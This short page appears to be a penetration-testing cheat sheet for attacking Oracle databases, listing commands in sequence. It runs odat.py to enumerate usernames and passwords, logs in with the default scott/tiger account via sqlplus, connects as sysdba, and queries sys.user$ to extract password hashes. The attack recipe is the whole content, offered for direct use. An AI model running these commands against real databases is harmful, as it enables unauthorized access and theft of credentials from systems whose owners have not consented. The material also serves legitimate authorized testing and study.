abuse

Enumerate user/pass

odat.py all -s "$ip"

Connect to database

sqlplus scott/tiger@"$ip"/XE

List all the tables

select table_name from all_tables;

Database enumeration

sqlplus <user>/<pass>@"$ip"/XE as sysdba

Extract password hashes

Select name, password from sys.user$;

Previousoracle-tns Nextosticket

Last updated 1 day ago